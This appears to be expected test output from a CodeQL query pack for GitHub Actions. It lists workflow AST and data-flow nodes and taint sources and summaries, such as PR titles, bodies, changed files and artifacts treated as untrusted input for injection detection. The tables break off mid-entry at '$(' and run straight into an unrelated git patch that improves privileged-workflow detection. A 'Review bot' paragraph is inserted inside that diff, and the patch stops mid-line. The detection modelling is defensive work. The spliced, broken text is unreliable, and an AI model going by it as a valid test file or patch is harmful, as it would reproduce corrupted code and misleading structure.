.github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | 
.github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | 
.github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| 
.github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -cfgNodes -| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| 
.github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:1:1:40:53 | enter on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| 
.github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -dfNodes -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | 
steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -argumentNodes -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -usesIds -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | -nodeLocations -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | 
.github/workflows/expression_nodes.yml@11:25:11:56 | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | 
.github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | -scopes -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| 
.github/workflows/test.yml:1:1:40:53 | on: push | -sources -| ahmadnassri/action-changed-files | * | output.files | PR changed files | -| ahmadnassri/action-changed-files | * | output.json | PR changed files | -| amannn/action-semantic-pull-request | * | output.error_message | PR title | -| cypress-io/github-action | * | env.GH_BRANCH | PR branch | -| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | -| dorny/paths-filter | * | output.changes | PR changed files | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | -| jitterbit/get-changed-files | * | output.added | PR changed files | -| jitterbit/get-changed-files | * | output.added_modified | PR changed files | -| jitterbit/get-changed-files | * | output.all | PR changed files | -| jitterbit/get-changed-files | * | output.deleted | PR changed files | -| jitterbit/get-changed-files | * | output.modified | PR changed files | -| jitterbit/get-changed-files | * | output.removed | PR changed files | -| jitterbit/get-changed-files | * | output.renamed | PR changed files | -| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | -| marocchino/on_artifact | * | output.* | Downloaded artifact | -| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | -| tj-actions/branch-names | * | output.current_branch | PR current branch | -| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | -| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | -| tj-actions/changed-files | * | output.added_files | PR changed files | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | -| tj-actions/changed-files | * | output.all_changed_files | PR changed files | -| 
tj-actions/changed-files | * | output.all_modified_files | PR changed files | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | -| tj-actions/changed-files | * | output.changed_keys | PR changed files | -| tj-actions/changed-files | * | output.copied_files | PR changed files | -| tj-actions/changed-files | * | output.deleted_files | PR changed files | -| tj-actions/changed-files | * | output.modified_files | PR changed files | -| tj-actions/changed-files | * | output.modified_keys | PR changed files | -| tj-actions/changed-files | * | output.other_changed_files | PR changed files | -| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | -| tj-actions/changed-files | * | output.other_modified_files | PR changed files | -| tj-actions/changed-files | * | output.renamed_files | PR changed files | -| tj-actions/changed-files | * | output.type_changed_files | PR changed files | -| tj-actions/changed-files | * | output.unknown_files | PR changed files | -| tj-actions/changed-files | * | output.unmerged_files | PR changed files | -| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | -| trilom/file-changes-action | * | output.files | PR changed files | -| trilom/file-changes-action | * | output.files_added | PR changed files | -| trilom/file-changes-action | * | output.files_modified | PR changed files | -| trilom/file-changes-action | * | output.files_removed | PR changed files | -| tzkhan/pr-update-action | * | output.headMatch | | -| xt0rted/slash-command-action | * | output.command-arguments | | -summaries -| akhileshns/heroku-deploy | * | input.branch | output.status | taint | -| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | -| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | -| ashley-taylor/read-json-property-action | * | input.json | output.value | 
taint | -| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | -| ashley-taylor/regex-property-action | * | input.value | output.value | taint | -| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | -| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | -| aszc/change-string-case-action | * | input.string | output.capitalized | taint | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | -| bobheadxi/deployments | * | input.env | output.env | taint | -| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | -| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | -| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | -| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | -| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | -| csexton/release-asset-action | * | input.release-url | output.url | taint | -| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | -| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | -| frabert/replace-string-action | * | input.string | output.replaced | taint | -| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | -| getsentry/action-release | * | 
input.version | output.version | taint | -| getsentry/action-release | * | input.version_prefix | output.version | taint | -| github/codeql-action | * | input.output | output.sarif-output | taint | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | -| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | -| haya14busa/action-cond | * | input.if_false | output.value | taint | -| haya14busa/action-cond | * | input.if_true | output.value | taint | -| hexlet/project-action | * | input.mount-path | env.PWD | taint | -| jsdaniell/create-json | * | input.dir | output.successfully | taint | -| jsdaniell/create-json | * | input.json | output.successfully | taint | -| jsdaniell/create-json | * | input.name | output.successfully | taint | -| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | -| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | -| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | -| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | -| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | -| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | -| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | -| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | -| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | -| octo-org/summary-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | -| octo-org/this-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | -| ruby/setup-ruby | * | 
input.ruby-version | output.ruby-prefix | taint | -| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | -| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | -| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | -| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | -| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | -| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | -calls -| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | -needs -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -testNormalizeExpr -| foo['bar'] == baz | foo.bar == baz | -| github.event.pull_request.user["login"] | github.event.pull_request.user.login | -| github.event.pull_request.user['login'] | github.event.pull_request.user.login | -| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | -writeToGitHubEnv -| id1 | $( Date: Thu, 11 Apr 2024 16:23:51 +0200 Subject: [PATCH 168/707] Improve privleged workflow detection --- ql/lib/codeql/actions/Ast.qll | 17 ++++++++++++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 23 +++++++++++++++++++ ql/src/Security/CWE-829/ArtifactPoisoning.ql | 2 +- .../CWE-094/.github/workflows/simple3.yml | 2 +- 4 files changed, 40 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cf5b63399f0a..91ee95a90ab4 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -20,7 +20,7 @@ module Utils { } bindingset[str] - string trimQuotes(string str) { + private string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } @@ -212,6 +212,13 @@ class Workflow extends AstNode instanceof WorkflowImpl { } predicate isPrivileged() { + // The Workflow has a permission to write to some scope + this.getPermissions().getAPermission() = "write" and + // The Workflow accesses a secret + exists(SecretsExpression expr | + expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + or // The Workflow is triggered by an event other than `pull_request` not this.hasSingleTrigger("pull_request") or @@ -248,7 +255,11 @@ class Outputs extends AstNode instanceof OutputsImpl { override string toString() { result = "Job outputs node" } } -class Permissions extends AstNode instanceof PermissionsImpl { } +class Permissions extends AstNode instanceof PermissionsImpl { + string getPermission(string perm) { result = super.getPermission(perm) } + + string getAPermission() { result = super.getAPermission() } +} class Strategy extends AstNode instanceof StrategyImpl { Expression getMatrixVarExpr(string varName) { result = super.getMatrixVarExpr(varName) } @@ -348,6 +359,8 @@ abstract class SimpleReferenceExpression extends AstNode instanceof SimpleRefere AstNode getTarget() { result = super.getTarget() } } +class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } + class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { string getStepId() { result = super.getStepId() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index bba5c1a47d34..300377536d67 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
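Review bot: The `GITHUB_TOKEN` exclusion in the new isPrivileged() clause compares the captured field name byte-for-byte, but Actions resolves secret names case-insensitively, so a workflow writing `${{ secrets.github_token }}` (a common spelling) is counted as accessing a real secret and, combined with a write scope, is reported as privileged even when it only touches the built-in token. Compare case-insensitively instead: `expr.getEnclosingWorkflow() = this and not expr.getFieldName().toUpperCase() = "GITHUB_TOKEN"`. The comment above the clause could also say why write permission alone is not enough here — the `and` with secret access is deliberate, and inside a chain of `or` disjuncts a reader may take it for a precedence slip; something like `// A write scope alone is not privileged on pull_request (GITHUB_TOKEN is read-only for forks); require a real secret as well` would make that explicit. The remainder of isPrivileged() and the enclosing `Workflow` class continue outside the hunk.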
@@ -484,6 +484,10 @@ class PermissionsImpl extends AstNodeImpl, TPermissionsNode { override Location getLocation() { result = n.getLocation() } override YamlMapping getNode() { result = n } + + string getPermission(string perm) { result = n.lookup(perm).(YamlScalar).getValue() } + + string getAPermission() { result = this.getPermission(_) } } class StrategyImpl extends AstNodeImpl, TStrategyNode { @@ -851,6 +855,25 @@ private string inputsCtxRegex() { Utils::wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) } +private string secretsCtxRegex() { result = Utils::wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } + +/** + * Holds for an expression accesing the `secrets` context. + * e.g. `${{ secrets.FOO }}` + */ +class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { + string fieldName; + + SecretsExpressionImpl() { + Utils::normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { none() } +} + /** * Holds for an expression accesing the `steps` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 6d3910e2ca5c..19b007902bd0 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -4,7 +4,7 @@ * @kind path-problem * @problem.severity warning * @precision high - * @security-severity 9.3 + * @security-severity 